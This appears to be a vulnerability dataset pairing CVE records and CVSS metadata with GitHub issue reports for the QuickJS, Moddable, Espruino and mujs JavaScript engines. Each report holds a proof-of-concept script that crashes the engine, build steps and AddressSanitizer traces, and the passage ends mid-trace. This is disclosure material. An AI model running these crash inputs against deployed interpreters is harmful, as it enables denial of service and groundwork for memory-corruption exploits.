0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #302 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #303 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #304 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #305 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #306 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #307 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #308 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #309 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #310 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 #311 0x40ca81 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:15687 #312 0x40d0d6 in JS_CallInternal.lto_priv.279 /home/node/xQuickJS/quickjs.c:16056 #313 0x5e202f in async_func_resume /home/node/xQuickJS/quickjs.c:18367 #314 0x5e202f in js_async_function_resume /home/node/xQuickJS/quickjs.c:18693 #315 0x5e352a in js_async_function_call.lto_priv.565 /home/node/xQuickJS/quickjs.c:18800 SUMMARY: AddressSanitizer: stack-overflow ??:0 malloc ==101779==ABORTING
stack overflow
https://api.github.com/repos/ldarren/QuickJS/issues/11/comments
3
2020-04-14T15:21:38Z
2020-07-08T17:56:33Z
https://github.com/ldarren/QuickJS/issues/11
599,655,444
11
2,180
CVE-2020-22882
2021-07-13T15:15:08.557
Issue was discovered in the fxParserTree function in moddable, allows attackers to cause denial of service via a crafted payload. Fixed in commit 723816ab9b52f807180c99fc69c7d08cf6c6bd61.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/351" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/351" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moddable:moddable:*:*:*:*:*:*:*:*", "matchCriteriaId": "7FE71E3E-5588-43F2-B143-A5D49EC7FA9D", "versionEndExcluding": "os200831", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "843" ]
843
https://github.com/Moddable-OpenSource/moddable/issues/351
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Moddable-OpenSource", "moddable" ]
# Enviroment ``` operating system: ubuntu18.04 apt-get install libgtk-3-dev export MODDABLE=~/src/moddable cd $MODDABLE/build/makefiles/lin make test command: ./build/bin/lin/release/xsc poc ``` # poc ``` function main() { let arr = [ 1.1, 1.1, 1.1, 1.1, 1.1 ]; var DAQh = new Int32Array([ arr, 47483647, arr, arr ]); var ECrE = new WeakSet([ [ arr, arr, arr, 3.141592653589793, 1200, arr, arr, arr ], [ 0.1, arr, arr, arr, arr, -1, arr, arr, arr ] ]); var QWYA = new WeakSet([ [ 9007199254740992, arr, arr, -9007199254740994, 1e-81 ], [ 1518500249, arr, arr, -9007199254740992 ] ]); opt(function () { }); var BXWH = new Int16Array([ arr, 3.141592653589793, 1e-15, arr, arr, 9007199254740994, arr ]); var RQpT = arr < BXWH['3']; var JXHX = opt(function () { }); var CCfc = new Array([ 9007199254740990, arr, arr, arr ]); var KGzE = new Uint16Array([ arr, -4294967297, 4294967296, 1e-81, -4294967297, 3.141592653589793, 2147483648 ]); var CPYW = new Set([ 1.7976931348623157e+308, KGzE['3'], arr, KGzE['6'], KGzE['2'], -4294967295 ]); var zdXw = new WeakSet([ [ arr, arr, arr ], [ -2147483647, 1e-81, arr, arr ] ]); var Ywyk = zdXw.delete(1518500249); var yGiG = new Int16Array([ -4294967295, KGzE['4'], 0.1, 1200, -1 ]); var jQRt = 0 != arr; var GQFe = new Set([ 1, arr, arr, 3.141592653589793, arr, arr, 3037000498 ]); var sjsZ = opt(function () { }); var bxnE = new WeakSet([ [ arr.length, 5, 0.1, arr ], [ 0.2, 1e-81, arr.length, arr, arr, -1, arr ] ]); arr = bxnE.add(arr); bxnE = bxnE.add(arr); var zMRn = new Int32Array([ 1e+81, arr, arr.length, arr, arr, arr, arr, 3 ]); function opt(f) { arr[0] = 1.1; var K2sQ = ~-9007199254740991; var CbWF = !0; arr[2] = 1.1; var bHeM = !2147483648; var eYaX = new WeakSet([ [], [ -9007199254740994, 1e+400, arr.length, -Infinity, arr ] ]); arr[3] = 1.1; } let r0 = () => '0'; for (var i = 0; i < 4096; i++) opt(r0); opt(() => { arr[ ] = {}; return '0'; }); } main(); ``` # vulnerability description: The stack traceback is shown in the figure: ![image](https://user-images.githubusercontent.com/13704697/79589157-8e471a00-8107-11ea-9565-cca4ce4f3ad1.png) When processing js code, first fxParserTree will be called to generate a node tree, And when met: ![image](https://user-images.githubusercontent.com/13704697/79589210-a323ad80-8107-11ea-8d14-7f1e9c7f9582.png) It can cause errors in object references, which can cause type confusion. The specific vulnerability trigger point is on line xsCode.c: 1153, as shown in the figure ![image](https://user-images.githubusercontent.com/13704697/79589249-b46cba00-8107-11ea-9111-cdfbab6e5e11.png) The current item is considered a temporary function type that has been declared, but in fact it is an undefined array type in poc. # PoC construction ![image](https://user-images.githubusercontent.com/13704697/79589301-c77f8a00-8107-11ea-9a06-4494056da105.png) Simply assign a value to an undefined array.
Type confusion vulnerability
https://api.github.com/repos/Moddable-OpenSource/moddable/issues/351/comments
5
2020-04-17T16:01:51Z
2020-05-22T23:12:42Z
https://github.com/Moddable-OpenSource/moddable/issues/351
602,078,781
351
2,181
CVE-2020-22884
2021-07-13T15:15:08.587
Buffer overflow vulnerability in function jsvGetStringChars in Espruino before RELEASE_2V09, allows remote attackers to execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/issues/1799" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/espruino/Espruino/issues/1799" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:espruino:espruino:*:*:*:*:*:*:*:*", "matchCriteriaId": "8A80C550-DCB6-434F-999E-885A7CE8427C", "versionEndExcluding": "2.09", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/espruino/Espruino/issues/1799
[ "Exploit", "Third Party Advisory" ]
github.com
[ "espruino", "Espruino" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: build with [ASAN](https://github.com/google/sanitizers) test command: ./espruino poc ``` # poc: ``` // Socket server and client test var result = 0; var port = 41234; let dgram = require('dgram'); let srv = dgram.createSocket('udp4'); srv = srv.bind(port, function() { srv.on('message', function(msg, info) { console.log("<"+JSON.stringify(msg)); console.log("<"+JSON.stringify(info)); srv.send(msg='!', info.port, info.address); }); }); srv.on('close', function() { console.log('server disconnected'); }); let client = dgram.createSocket('udp4'); client.on('message', function(msg, info) { console.log(">"+JSON.stringify(msg)); console.log(">"+JSON.stringify(info)); result = msg=="42!" && info.address=="127.0.0.1" && info.port==port; clearTimeout(failTimeout); // stop the fail fast srv.close(); client.close(); }); client.on('close', function() { console.log('client disconnected'); }); // fail the test fast if broken failTimeout = setTimeout(function() { client.close(); srv.close(); }, 100); client.send('42', port, 'localhost'); ``` # vulnerability description: The poc will cause the memory corruption of the parser. Below is the output of ASAN: ``` ---------------------------------- ----------------------------- TEST es ____ _ | __|___ ___ ___ _ _|_|___ ___ | __|_ -| . | _| | | | | . | |____|___| _|_| |___|_|_|_|___| |_| espruino.com 2v04 (c) 2019 G.Williams Espruino is Open Source. Our work is supported only by sales of official boards and donations: http://espruino.com/Donate <"42" <{"address":"127.0.0.1","port":45749,"size":2} >================================================================= ==125126==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7b7767c9 at pc 0x000000441623 bp 0x7ffe7b776650 sp 0x7ffe7b776640 WRITE of size 1 at 0x7ffe7b7767c9 thread T0 #0 0x441622 in jsvGetStringChars src/jsvar.c:1295 #1 0x541020 in socketReceivedUDP libs/network/socketserver.c:392 #2 0x54150a in socketReceived libs/network/socketserver.c:417 #3 0x5431dd in socketClientConnectionsIdle libs/network/socketserver.c:710 #4 0x543e4f in socketIdle libs/network/socketserver.c:837 #5 0x6b66c1 in jswrap_net_idle libs/network/jswrap_net.c:31 #6 0x50fae6 in jswIdle gen/jswrapper.c:1844 #7 0x4e279d in jsiIdle src/jsinteractive.c:2117 #8 0x4e391d in jsiLoop src/jsinteractive.c:2204 #9 0x64ad56 in run_test targets/linux/main.c:74 #10 0x406fe9 in main targets/linux/main.c:287 #11 0x7f0473ff482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x408178 in _start (/home/node/Espruino/espruino+0x408178) Address 0x7ffe7b7767c9 is located in stack of thread T0 at offset 105 in frame #0 0x540d8f in socketReceivedUDP libs/network/socketserver.c:387 This frame has 2 object(s): [32, 48) 'args' [96, 105) 'buf' <== Memory access at offset 105 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow src/jsvar.c:1295 jsvGetStringChars Shadow bytes around the buggy address: 0x10004f6e6ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f6e6cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f6e6cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f6e6cd0: f1 f1 f1 f1 00 00 00 00 00 f4 f4 f4 f3 f3 f3 f3 0x10004f6e6ce0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 =>0x10004f6e6cf0: 00 00 f4 f4 f2 f2 f2 f2 00[01]f4 f4 f3 f3 f3 f3 0x10004f6e6d00: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x10004f6e6d10: 00 00 f4 f4 f3 f3 f3 f3 00 00 00 00 00 00 00 00 0x10004f6e6d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f6e6d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f6e6d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==125126==ABORTING ```
buffer overflow
https://api.github.com/repos/espruino/Espruino/issues/1799/comments
9
2020-04-15T16:09:44Z
2020-05-27T07:01:55Z
https://github.com/espruino/Espruino/issues/1799
600,416,823
1,799
2,182
CVE-2020-22885
2021-07-13T15:15:08.617
Buffer overflow vulnerability in mujs before 1.0.8 due to recursion in the GC scanning phase, allows remote attackers to cause a denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ccxvii/mujs/issues/133" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ccxvii/mujs/issues/133" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:artifex:mujs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E4F4992-BAA1-423B-8E9C-6CEE738303B0", "versionEndExcluding": "1.0.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/ccxvii/mujs/issues/133
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ccxvii", "mujs" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: make build=sanitize test command: ./mujs poc ``` # poc: ``` /* est bound function chainnal implementation * to "collapse" bound funct /*=== F() bound foo object this-F string foo undefined undefined undefined undefined undefined undefined G() bound bound foo object this-F string foo string bar string quux unarg-52 53 string arg-53 54 string arg-54 55 string arg-55 56 string arg-56 57 string arg-57 58 string arg-58 59 string arg-59 60 string arg-60 61 string arg-61 62 string arg-62 63 string arg-63 64 string arg-64 65 string arg-65 66 string arg-66 67 string arg-67 68 string arg-68 69 string arg-69 70 string arg-70 71 string arg-71 72 string arg-72 73 string arg-73 74 string arg-74 75 string arg-75 76 string arg-76 77 string arg-77 78 string arg-78 79 string arg-79 80 string arg-80 81 string arg-81 82 string arg-82 83 string arg-83 84 string arg-84 85 string arg-85 86 string arg-86 87 string arg-87 88 string arg-88 89 string arg-89 90 string arg-90 91 string arg-91 92 string arg-92 93 string arg-93 94 string arg-94 95 string arg-95 96 string arg-96 97 string arg-97 98 string arg-98 99 string arg-99 ===*/ function test() { var func; var F, G, H, I; // Final function is an ECMAScript function. func = function foo(a, b, c, d) { print(typeof this, this); print(typeof a, a); print(typeof b, b); print(typeof c, c); print(typeof d, d); }; F = func.bind('this-F', 'foo'); G = F.bind('this-G', 'bar', 'quux'); H = G.bind('this-H', 'baz', 'quuux'); I = G.bind('this-I', 123, 234); // both H and I bind via G print('F()', F.name); F(); print('G()', G.name); G(); print('H()', H.name); H(); print('I()', I.name); I(); // Final function is a native function. func = Math.max; F = func.bind(null); G = F.bind(null, 3); H = G.bind(null, 4); I = H.bind(null, 5); print('F()', F.name); print(F()); print('G()', G.name); print(G()); print('H()', H.name); print(H()); print('I()', I.name); print(I()); // Lightfunc final target needs testing too; it is covered by Math.max() // if DUK_USE_LIGHTFUNC_BUILTINS is enabled. // Long chain. func = function foo() { print(typeof this, this); print(arguments.length); for (var i = 0; i < arguments.length; i++) { print(i, typeof arguments[i], arguments[i]); } }; for (var i = 0;-i < 100; i++) { func = func.bind('this-' + i, 'arg-' + i); } print(func.name); func(); } try { test(); } catch (e) { } ``` # vulnerability description: Poc will cause stack overflow. As shown below: ``` ASAN:SIGSEGV ================================================================= ==16827==ERROR: AddressSanitizer: stack-overflow on address 0x7ffeec639ff8 (pc 0x00000041eceb bp 0x7ffeec63a000 sp 0x7ffeec639fe0 T0) #0 0x41ecea in jsG_markproperty /home/node/xmujs/jsgc.c:76 #1 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #2 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #3 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #4 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #5 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #6 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #7 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #8 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #9 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #10 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #11 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #12 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #13 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #14 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #15 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #16 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #17 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #18 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #19 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #20 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #21 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #22 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #23 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #24 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #25 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #26 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #27 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #28 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #29 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #30 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #31 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #32 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #33 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #34 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #35 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #36 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #37 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #38 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #39 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #40 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #41 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #42 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #43 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #44 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #45 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #46 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #47 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #48 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #49 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #50 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #51 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #52 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #53 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #54 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #55 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #56 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #57 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #58 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #59 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #60 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #61 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #62 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #63 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #64 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #65 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #66 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #67 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #68 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #69 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #70 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #71 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #72 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #73 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #74 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #75 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #76 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #77 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #78 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #79 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #80 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #81 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #82 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #83 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #84 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #85 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #86 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #87 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #88 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #89 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #90 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #91 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #92 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #93 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #94 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #95 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #96 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #97 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #98 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #99 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #100 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #101 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #102 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #103 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #104 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #105 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #106 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #107 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #108 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #109 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #110 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #111 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #112 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #113 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #114 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #115 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #116 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #117 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #118 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #119 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #120 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #121 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #122 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #123 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #124 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #125 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #126 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #127 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #128 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #129 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #130 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #131 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #132 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #133 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #134 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #135 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #136 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #137 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #138 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #139 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #140 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #141 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #142 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #143 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #144 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #145 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #146 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #147 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #148 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #149 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #150 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #151 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #152 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #153 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #154 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #155 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #156 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #157 0x41edf3 in jsG_markproperty 